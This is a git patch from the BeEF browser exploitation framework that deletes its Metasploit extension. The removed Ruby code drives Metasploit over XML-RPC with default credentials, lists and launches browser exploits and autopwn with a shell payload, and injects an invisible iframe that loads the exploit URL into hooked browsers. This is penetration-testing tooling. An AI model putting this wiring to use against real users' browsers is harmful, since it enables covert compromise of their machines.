From 97b244d61a51e68d9bc4a9d36de3093f2cc8e330 Mon Sep 17 00:00:00 2001 From: passbe Date: Fri, 2 Sep 2011 23:58:55 +0000 Subject: [PATCH] Removing old Metasploit extension git-svn-id: https://beef.googlecode.com/svn/trunk@1258 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- extensions/metasploit/config.yaml | 33 ---- extensions/metasploit/dbmigration.rb | 96 ----------- extensions/metasploit/extension.rb | 33 ---- extensions/metasploit/filters.rb | 28 ---- extensions/metasploit/msfcommand.rb | 228 -------------------------- extensions/metasploit/rpcclient.rb | 230 --------------------------- 6 files changed, 648 deletions(-) delete mode 100644 extensions/metasploit/config.yaml delete mode 100644 extensions/metasploit/dbmigration.rb delete mode 100644 extensions/metasploit/extension.rb delete mode 100644 extensions/metasploit/filters.rb delete mode 100644 extensions/metasploit/msfcommand.rb delete mode 100644 extensions/metasploit/rpcclient.rb diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml deleted file mode 100644 index e246c8e36..000000000 --- a/extensions/metasploit/config.yaml +++ /dev/null @@ -1,33 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# Enable MSF by changing extension:metasploit:enable to true -# Then set msf_callback_host to be the public IP of your MSF server -# -# Ensure you load the xmlrpc interface in Metasploit -# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web -# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below. -beef: - extension: - metasploit: - name: 'Metasploit' - enable: true - host: "127.0.0.1" - url-path: "/RPC2" - port: 55553 - user: "msf" - pass: "abc123" - callback_host: "192.168.84.1" - autopwn_url: "autopwn" diff --git a/extensions/metasploit/dbmigration.rb b/extensions/metasploit/dbmigration.rb deleted file mode 100644 index c00a13979..000000000 --- a/extensions/metasploit/dbmigration.rb +++ /dev/null @@ -1,96 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -module BeEF -module Extension -module Metasploit - - module DbMigration - - extend BeEF::API::Migration - - def self.migrate_commands - msf = BeEF::Extension::Metasploit::RpcClient.instance - - # verify that metasploit is enabled and we are logged in. - if(msf.is_enabled && msf.login()) - Thread.new() { - begin - sploits = msf.browser_exploits() - sploits.each do |sploit| - if not BeEF::Core::Models::CommandModule.first(:name => sploit) - mod = BeEF::Core::Models::CommandModule.new(:path => "Dynamic/Msf", :name => sploit) - mod.save - if mod.dynamic_command_info == nil - msfi = msf.get_exploit_info(sploit) - st = sploit.split('/').first - targets = [] - - os_name = BeEF::Core::Constants::Os::match_os(st) - - browsers = BeEF::Core::Constants::Browsers::match_browser(msfi['name'] + msfi['targets'].to_json) - targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0 - - browsers.each do |bn| - targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_WORKING - } - end - - targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING} - - msfci = BeEF::Core::Models::DynamicCommandInfo.new( - :name => msfi['name'], - :description => msfi['description'], - :targets => targets.to_json) - - mod.dynamic_command_info = msfci - mod.save - end - end - end - - payloads = msf.payloads() - payloads.each do |payload| - if not BeEF::Core::Models::DynamicPayloads.first( :name => payload) - pl = BeEF::Core::Models::DynamicPayloads.new( :name => payload) - pl.save - opts = msf.payload_options(payload) - opts.keys.each do |opt| - next if opts[opt]['advanced'] or opts[opt]['evasion'] - pl.dynamic_payload_info.new(:name => opt, :description => opts[opt]['desc'], :required => opts[opt]['required'], :value => opts[opt]['default']) - end - pl.save - end - end - - # Catching and printing exceptions in regards to migration - # of Metasploit exploits into BeEF - rescue Exception => e - puts e.message - puts e.backtrace - end - msf.launch_autopwn() - - }#thread end - end - end - - end - -end -end -end diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb deleted file mode 100644 index 4db03c885..000000000 --- a/extensions/metasploit/extension.rb +++ /dev/null @@ -1,33 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -module BeEF -module Extension -module Metasploit - - extend BeEF::API::Extension - - @short_name = @full_name = 'metasploit' - - @description = 'use metasploit exploits with beef' - -end -end -end - -require 'extensions/metasploit/filters' -require 'extensions/metasploit/rpcclient' -require 'extensions/metasploit/msfcommand' -require 'extensions/metasploit/dbmigration' diff --git a/extensions/metasploit/filters.rb b/extensions/metasploit/filters.rb deleted file mode 100644 index 6c3d900f7..000000000 --- a/extensions/metasploit/filters.rb +++ /dev/null @@ -1,28 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# -# We extend the default filters to include the filters for Metasploit -# -module BeEF -module Filters - - def self.is_valid_msf_payload_name?(name) - return false if only?("a-z_/", name) - true - end - -end -end \ No newline at end of file diff --git a/extensions/metasploit/msfcommand.rb b/extensions/metasploit/msfcommand.rb deleted file mode 100644 index 3ae64ff34..000000000 --- a/extensions/metasploit/msfcommand.rb +++ /dev/null @@ -1,228 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -module BeEF -module Modules -module Commands - - class Msf < BeEF::Core::Command - - def initialize - h = { - 'name' => 'Generic Metasploit Exploit', - 'description' => 'This module will launch a Metasploit exploit against the host', - 'category' => 'Metasploit', - 'author' => ['sussurro'] - } - - BeEF::Core::Configuration.instance.set('beef.module.gmsf', h) - super('gmsf') - end - - def callback - save({'result' => @datastore['result']}) - end - - # - def update_info(id) - mod = BeEF::Core::Models::CommandModule.first(:id => id) - msfinfo = nil - targets = [] - - if mod.dynamic_command_info == nil - msf = BeEF::Extension::Metasploit::RpcClient.instance - msf.login() - msfinfo = msf.get_exploit_info(mod.name) - - st = mod.name.split('/').first - puts "st: " + st - - os_name = BeEF::Core::Constants::Os::match_os(st) - - browsers = BeEF::Core::Constants::Browsers::match_browser(msfinfo['name'] + msfinfo['targets'].to_json) - - targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0 - - browsers.each do |bn| - targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_WORKING - } - end - - targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING} - - mod.dynamic_command_info = BeEF::Core::Models::DynamicCommandInfo.new( - :name => msfinfo['name'], - :description => msfinfo['description'], - :targets => targets.to_json) - mod.save - else - msfinfo = mod.dynamic_command_info - targets = JSON.parse(msfinfo['targets']) - end - - @info['Name'] = msfinfo['name'] - @info['Description'] = msfinfo['description'] - @info['MsfModName'] = mod.name - @info['mod-id'] = mod.id - @info['msfid'] = mod.name - @target = targets - end - - def update_data() - modname = @info['MsfModName'] - - msf = BeEF::Extension::Metasploit::RpcClient.instance - if not msf.is_enabled - @info['Description'] += "
" + "*"*15 + "WARNING" + "*"*15 + "
" - @info['Description'] += "Metasploit capapbilities have been disabled, please verify your configuration or if msf_enabled = 1 then check the BeEF console for errors" - return - end - - msfoptions = msf.get_options(modname) - - msfoptions.keys.each { |k| - next if msfoptions[k]['advanced'] == true - next if msfoptions[k]['evasion'] == true - - @info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => msfoptions[k]['desc']} - - case msfoptions[k]['type'] - when "string","address","port" - msfoptions[k]['default'] = rand(32**20).to_s(32) if k == "URIPATH" - @info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || msfoptions[k]['default'])} - when "bool" - @info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k } - when "enum" - enumdata = [] - msfoptions[k]['enums'].each { |e| - enumdata << [e] - } - @info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => enumdata, 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || msfoptions[k]['default'])} - end - } - - msfpayloads = msf.get_payloads(modname) - - return if not msfpayloads or not msfpayloads['payloads'] - - payloads = msfpayloads['payloads'] - - pl = [] - pl << [(oc_value('PAYLOAD') || 'generic/shell_bind_tcp')] - - payloads.each { |p| - pl << [p] - } - - @info['Data'] << { 'name' => 'PAYLOAD', - 'type' => 'combobox', - 'anchor' => '95% -100', - 'ui_label' => 'Payload', - 'store_type' => 'arraystore', - 'store_fields' => ['payload'], - 'store_data' => pl, - 'valueField' => 'payload', - 'displayField' => 'payload' , - 'autoWidth' => true, - 'mode' => 'local', - 'reloadOnChange' => true, # reload payloads - 'defaultPayload' => "generic/shell_bind_tcp", # default combobox value - 'emptyText' => "select a payload..." - } - - @info['Data'] << { 'name' => 'mod_id' , 'id' => 'mod_id', 'type' => 'hidden', 'value' => @info['mod-id'] } - end - - def get_payload_options(payload_name) - # get payload options from metasploit - msf_xmlrpc_clinet = BeEF::Extension::Metasploit::RpcClient.instance - msf_xmlrpc_clinet.login() - payload_options = msf_xmlrpc_clinet.payload_options(payload_name) - - info = {} - info['Data'] = [] - - payload_options.keys.each { |k| - next if payload_options[k]['advanced'] == true - next if payload_options[k]['evasion'] == true - info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => payload_options[k]['desc']} - case payload_options[k]['type'] - when "string","address","port","raw","path", "integer" - payload_options[k]['default'] = "127.0.0.1" if k == "RHOST" - info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || payload_options[k]['default'])} - when "bool" - info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k } - when "enum" - info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => payload_options[k]['enums'], 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || payload_options[k]['default'])} - else - # Debug output if the payload option type isn't found - puts "K => #{k}\n" - puts "Status => #{payload_options[k]['advanced']}\n" - puts "Type => #{payload_options[k]['type']}\n" - puts payload_options[k] - end - } - - # turn results into JSON - payload_options_json = [] - payload_options_json[1] = JSON.parse(info.to_json) - - JSON.parse(info.to_json) - - end - - def launch_exploit(opts) - msf = BeEF::Extension::Metasploit::RpcClient.instance - msf.login() - ret = msf.launch_exploit(@info['msfid'],opts) - @output = "\n" if ret['result'] == 'success' - ret - end - - def output - if @datastore - @datastore['command_url'] = BeEF::Core::Server.instance.get_command_url(@default_command_url) - @datastore['command_id'] = @command_id - end - - return " -beef.execute(function() { - var result; - - try { - var sploit = beef.dom.createInvisibleIframe(); - sploit.src = '#{datastore['sploit_url']}'; - } catch(e) { - for(var n in e) - result+= n + ' ' + e[n] ; - } - -});" - end - - def callback - content = {} - content['Exploit Results'] = @datastore['result'] - save content - end - end - -end -end -end - - diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb deleted file mode 100644 index 04f4a6d21..000000000 --- a/extensions/metasploit/rpcclient.rb +++ /dev/null @@ -1,230 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -module BeEF -module Extension -module Metasploit - - # - # XML RPC Client for Metasploit - # - class RpcClient < ::XMLRPC::Client - - include Singleton - - def initialize - @config = BeEF::Core::Configuration.instance - @enabled = (@config.get('beef.extension.metasploit.enable')) - - return if (not @enabled) - - host = @config.get('beef.extension.metasploit.host') - path = @config.get('beef.extension.metasploit.url-path') - port = @config.get('beef.extension.metasploit.port') - @un = @config.get('beef.extension.metasploit.user') - @pw = @config.get('beef.extension.metasploit.pass') - @apurl = @config.get('beef.extension.metasploit.autopwn_url') || "autopwn" - @lock = false - - if(not host or not path or not port or not @un or not @pw) - print_error 'There is not enough information to initalize Metasploit connectivity at this time' - print_error 'Please check your options in config.yaml to verify that all information is present' - @enabled = false - end - - @token = nil - @lastauth = nil - - super(host,path,port) - end - - def get_lock() - sleep 0.2 while @lock - @lock = true - end - - def release_lock() - @lock = false - end - - # is metasploit enabled in the configuration - def is_enabled - @enabled - end - - # login into metasploit - def login - get_lock() - res = self.call("auth.login", @un ,@pw ) - - if(not (res and res['result'] == "success")) - @enabled = false - release_lock() - print_error 'Could not authenticate to Metasploit xmlrpc.' - return false - end - - print_info 'Successful connection with Metasploit.' if not @lastauth - - @token = res['token'] - @lastauth = Time.now - - release_lock() - true - end - - # sends commands to the metasploit xml rpc server - def call(meth, *args) - return if not @enabled - - if(meth != "auth.login") - self.login() if not @token - args.unshift(@token) - end - - begin - super(meth, *args) - rescue Errno::ECONNREFUSED - print_error "Connection to Metasploit backend failed." - @enabled = false - return false - rescue XMLRPC::FaultException => e - if e.faultCode == 401 and meth == "auth.login" - print_error "Your username and password combination was rejected by the Metasploit backend server" - @enabled = false - elsif e.faultCode == 401 - res = self.login() - else - print_error "An unknown exception has occured while talking to the Metasploit backend." - print_error "The Exception text is (#{e.faultCode} : #{e.faultString}." - print_error "Please check the Metasploit logs for more details." - end - return false - rescue Exception => e - print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend." - print_error "Please check the Metasploit logs for more details." - return false - end - end - - def browser_exploits() - return if not @enabled - - get_lock() - res = self.call('module.exploits') - return [] if not res or not res['modules'] - - mods = res['modules'] - ret = [] - - mods.each do |m| - ret << m if(m.include? '/browser/') - end - - release_lock() - ret.sort - end - - def get_exploit_info(name) - return if not @enabled - get_lock() - res = self.call('module.info','exploit',name) - release_lock() - res || {} - end - - def get_payloads(name) - return if not @enabled - get_lock() - res = self.call('module.compatible_payloads',name) - release_lock() - res || {} - end - - def get_options(name) - return if not @enabled - get_lock() - res = self.call('module.options','exploit',name) - release_lock() - res || {} - end - - def payloads() - return if not @enabled - get_lock() - res = self.call('module.payloads') - release_lock() - return {} if not res or not res['modules'] - res['modules'] - end - - def payload_options(name) - return if not @enabled - get_lock() - res = self.call('module.options','payload',name) - release_lock - return {} if not res - res - end - - def launch_exploit(exploit,opts) - return if not @enabled - get_lock() - begin - res = self.call('module.execute','exploit',exploit,opts) - rescue Exception => e - print_error "Exploit failed for #{exploit} \n" - release_lock() - return false - end - - release_lock() - - uri = "" - if opts['SSL'] - uri += "https://" - else - uri += "http://" - end - - uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH'] - - res['uri'] = uri - res - end - - def launch_autopwn - return if not @enabled - opts = { - 'LHOST' => @config.get('beef.extension.metasploit.callback_host') , - 'URIPATH' => @apurl - } - get_lock() - begin - res = self.call('module.execute','auxiliary','server/browser_autopwn',opts) - rescue Exception => e - print_error "Failed to launch autopwn\n" - release_lock() - return false - end - release_lock() - - end - - end - -end -end -end